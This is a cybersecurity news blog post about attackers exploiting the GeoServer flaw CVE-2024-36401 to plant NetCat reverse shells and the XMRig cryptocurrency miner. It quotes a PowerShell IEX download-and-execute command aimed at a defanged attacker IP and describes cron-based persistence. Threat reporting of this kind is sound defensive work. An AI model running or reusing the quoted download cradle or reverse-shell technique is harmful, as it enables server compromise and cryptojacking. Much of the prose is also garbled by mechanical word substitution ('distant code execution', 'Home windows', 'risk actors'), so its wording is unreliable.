Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

Hackers Exploiting GeoServer RCE Vulnerability to Deploy CoinMiner

Posted on July 10, 2025July 10, 2025 By CWS

A essential distant code execution vulnerability in GeoServer has change into a primary goal for cybercriminals deploying cryptocurrency mining malware throughout world networks.

The vulnerability, designated CVE-2024-36401, impacts the favored open-source Geographic Data System server written in Java, which supplies important platforms for spatial knowledge processing in quite a few organizations worldwide.

For the reason that vulnerability’s disclosure in 2024, risk actors have aggressively exploited unpatched GeoServer installations to execute malicious code remotely.

The assaults have escalated considerably, with cybercriminals systematically scanning for susceptible servers and deploying refined malware payloads that embody each distant entry instruments and cryptocurrency miners.

The malware marketing campaign demonstrates exceptional persistence and technical sophistication, concentrating on each Home windows and Linux environments working susceptible GeoServer installations.

ASEC analysts recognized a number of assault situations in South Korea, the place risk actors efficiently compromised Home windows-based GeoServer deployments that had not utilized the mandatory safety patches for CVE-2024-36401.

The assault methodology reveals a multi-stage an infection course of that begins with distant code execution by way of PowerShell instructions.

In documented circumstances, attackers executed malicious PowerShell scripts to obtain and set up NetCat, a community utility that capabilities as a reverse shell, offering persistent distant entry to compromised programs.

The NetCat set up happens by way of the “-e” argument, establishing connections to command and management servers that allow steady system manipulation.

Cryptocurrency Mining Deployment and Persistence Mechanisms

The first goal of those assaults facilities on deploying XMRig, a Monero cryptocurrency miner that hijacks system sources for illicit mining operations. The risk actors show platform-aware techniques, using PowerShell scripts for Home windows environments and Bash scripts for Linux programs.

The Home windows variant executes the command IEX(New-ObjectNet.WebClient).DownloadString(‘hxxp://182.218.82.[1]4/js/1/gw.txt’) to retrieve and set up XMRig parts.

PowerShell script to put in XMRig (Supply – ASEC)

Right here’s the PowerShell script set up course of and the corresponding Bash script methodology for Linux programs.

Bash script to put in XMRig (Supply – ASEC)

The Linux variant contains further persistence mechanisms by way of Cron job registration, making certain the malware maintains operational continuity even after system reboots. These Cron jobs execute scripts downloaded from Pastebin, creating a number of layers of persistence that complicate elimination efforts.

The mining operations hook up with pool.supportxmr.com:443, producing Monero cryptocurrency immediately into attacker-controlled wallets whereas concurrently degrading system efficiency and growing operational prices for victims.

Examine reside malware conduct, hint each step of an assault, and make sooner, smarter safety selections -> Strive ANY.RUN now

Cyber Security News Tags:CoinMiner, Deploy, Exploiting, GeoServer, Hackers, RCE, Vulnerability

Post navigation

Previous Post: Four Arrested in UK Over M&S, Co-op Cyberattacks
Next Post: Ingram Micro Restores Systems Impacted by Ransomware

Related Posts

New Rust Based InfoStealer Extracts Sensitive Data from Chromium-based Browsers Cyber Security News
Top 3 Evasion Techniques In Phishing Attacks: Real Examples Inside  Cyber Security News
Kali GPT- AI Assistant That Transforms Penetration Testing on Kali Linux Cyber Security News
Authorities Dismantled AVCheck, a Tool For Testing Malware Against Antivirus Detection Cyber Security News
Instagram Started Using 1-Week Validity TLS certificates and Changes Them Daily Cyber Security News
Androxgh0st Botnet Operators Exploiting US University For Hosting C2 Logger Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • How to Monitor Your Identity on the Dark Web
  • Meta’s Llama Firewall Bypassed Using Prompt Injection Vulnerability
  • OpenAI is to Launch a AI Web Browser in Coming Weeks
  • WordPress GravityForms Plugin Hacked to Include Malicious Code
  • First Rowhammer Attack Targeting NVIDIA GPUs

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • How to Monitor Your Identity on the Dark Web
  • Meta’s Llama Firewall Bypassed Using Prompt Injection Vulnerability
  • OpenAI is to Launch a AI Web Browser in Coming Weeks
  • WordPress GravityForms Plugin Hacked to Include Malicious Code
  • First Rowhammer Attack Targeting NVIDIA GPUs

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News